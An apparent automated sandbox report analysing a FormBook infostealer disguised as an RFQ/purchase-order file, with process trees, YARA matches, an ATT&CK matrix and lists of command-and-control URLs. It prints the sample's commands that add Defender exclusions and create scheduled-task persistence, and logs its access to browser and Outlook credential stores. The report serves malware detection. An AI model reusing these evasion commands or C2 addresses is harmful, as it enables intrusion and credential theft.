                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: mrNbohrgjTw.exe, 0000000B.00000002.873762675.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000000.379732205.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409275570.0000000000D10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: mrNbohrgjTw.exe, 0000000B.00000002.873762675.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000000.379732205.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409275570.0000000000D10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: mrNbohrgjTw.exe, 0000000B.00000002.873762675.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000000.379732205.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409275570.0000000000D10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrQueries volume information: C:\Users\user\Desktop\RFQ_P.O.1212024.scr VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeQueries volume information: C:\Users\user\AppData\Roaming\PEJmengI.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jz-tmbi.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jz-tmbi.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jz-tmbi.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jz-tmbi.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jz-tmbi.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jz-tmbi.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jz-tmbi.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jz-tmbi.zip VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E91E90 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_61E91E90
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873699119.0000000001D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398641756.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.873703699.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873699119.0000000001D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398641756.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.873703699.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E14193 sqlite3_bind_parameter_index,12_2_61E14193
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E032A7 sqlite3_bind_parameter_count,12_2_61E032A7
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E032B9 sqlite3_bind_parameter_name,12_2_61E032B9
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E285E2 sqlite3_bind_text,12_2_61E285E2
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E2859B sqlite3_bind_blob64,12_2_61E2859B
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E10565 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,12_2_61E10565
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E28574 sqlite3_mutex_leave,sqlite3_bind_blob,12_2_61E28574
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E10415 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,12_2_61E10415
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E287A8 sqlite3_bind_pointer,sqlite3_mutex_leave,12_2_61E287A8
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E28777 sqlite3_bind_null,sqlite3_mutex_leave,12_2_61E28777
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E28751 sqlite3_bind_int,sqlite3_bind_int64,12_2_61E28751
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E28702 sqlite3_bind_int64,sqlite3_mutex_leave,12_2_61E28702
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E2869D sqlite3_bind_double,sqlite3_mutex_leave,12_2_61E2869D
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E28676 sqlite3_bind_text16,12_2_61E28676
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E28609 sqlite3_bind_text64,12_2_61E28609
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E28979 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,12_2_61E28979
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E28892 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,12_2_61E28892
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E28825 sqlite3_bind_zeroblob,sqlite3_mutex_leave,12_2_61E28825

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory1
                File and Directory Discovery                		Remote Desktop Protocol1
                Browser Session Hijacking                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)512
                Process Injection                		1
                Abuse Elevation Control Mechanism                		Security Account Manager16
                System Information Discovery                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Scheduled Task/Job                		4
                Obfuscated Files or Information                		NTDS2
                Security Software Discovery                		Distributed Component Object Model1
                Email Collection                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets2
                Process Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials41
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion                		Proc Filesystem1
                Remote System Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
                Process Injection                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573579 Sample: RFQ_P.O.1212024.scr Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 57 www.diozusemails.buzz 2->57 77 Suricata IDS alerts for network traffic 2->77 79 Sigma detected: Scheduled temp file as task from temp location 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 7 other signatures 2->83 10 RFQ_P.O.1212024.scr 1 11 2->10         started        14 taskeng.exe 1 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\PEJmengI.exe, PE32 10->51 dropped 53 C:\Users\...\PEJmengI.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmp61C0.tmp, XML 10->55 dropped 93 Uses schtasks.exe or at.exe to add and modify task schedules 10->93 95 Writes to foreign memory regions 10->95 97 Allocates memory in foreign processes 10->97 99 2 other signatures 10->99 16 RegSvcs.exe 10->16         started        19 powershell.exe 4 10->19         started        21 powershell.exe 4 10->21         started        23 schtasks.exe 10->23         started        25 PEJmengI.exe 4 14->25         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 16->67 27 mrNbohrgjTw.exe 16->27 injected 69 Machine Learning detection for dropped file 25->69 71 Writes to foreign memory regions 25->71 73 Allocates memory in foreign processes 25->73 75 2 other signatures 25->75 30 powershell.exe 25->30         started        32 powershell.exe 25->32         started        34 schtasks.exe 25->34         started        36 RegSvcs.exe 25->36         started        process9 signatures10 101 Maps a DLL or memory area into another process 27->101 103 Found direct / indirect Syscall (likely to bypass EDR) 27->103 38 msinfo32.exe 1 20 27->38         started        process11 dnsIp12 59 www.sqlite.org 45.33.6.223, 49166, 80 LINODE-APLinodeLLCUS United States 38->59 49 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 38->49 dropped 85 Tries to steal Mail credentials (via file / registry access) 38->85 87 Tries to harvest and steal browser information (history, passwords, etc) 38->87 89 Maps a DLL or memory area into another process 38->89 91 Queues an APC in another process (thread injection) 38->91 43 mrNbohrgjTw.exe 38->43 injected 47 firefox.exe 38->47         started        file13 signatures14 process15 dnsIp16 61 www.zoiheat.xyz 43->61 63 www.learniit.info 203.161.42.73, 49179, 49180, 49181 VNPT-AS-VNVNPTCorpVN Malaysia 43->63 65 19 other IPs or domains 43->65 105 Found direct / indirect Syscall (likely to bypass EDR) 43->105 signatures17 107 Performs DNS queries to domains with low reputation 61->107

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ_P.O.1212024.scr39%VirustotalBrowse
                RFQ_P.O.1212024.scr100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\PEJmengI.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.bankseedz.info/an5q/0%Avira URL Cloudsafe
                https://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH0%Avira URL Cloudsafe
                http://www.learniit.info/n8su/0%Avira URL Cloudsafe
                http://www.questmatch.pro/1yxc/0%Avira URL Cloudsafe
                http://www.zoiheat.xyz/ti6k/?e2E=wRQ8oHXx&x4=aooN9XnxZY5vLLqjRSo6DpWN4fgsD3CW9S/CD7OrytslWQsmx2XgIWNhq2ot6qnFvMzcVXyCAoOGhogdqicJCN8EOoBxC+Cz12DK8fUp+S6/f8QxRRTszX5C8Y750%Avira URL Cloudsafe
                http://www.airrelax.shop/gvzg/0%Avira URL Cloudsafe
                http://www.bankseedz.info/an5q/?x4=ht9kvQ/be1JP/b8GmoJbUpka8BxXZHDjKA2fsfIfXx0uGnoFDxCnuQ2Syamf2AV1LytjWJjmrwJ3QA9mKPa/MpeqH9CIj747RQUAZUa71OOzgLnsSxYrvroJ5BNI&e2E=wRQ8oHXx0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&e2E=wRQ8oHXx0%Avira URL Cloudsafe
                http://www.carsten.studio/8mom/0%Avira URL Cloudsafe
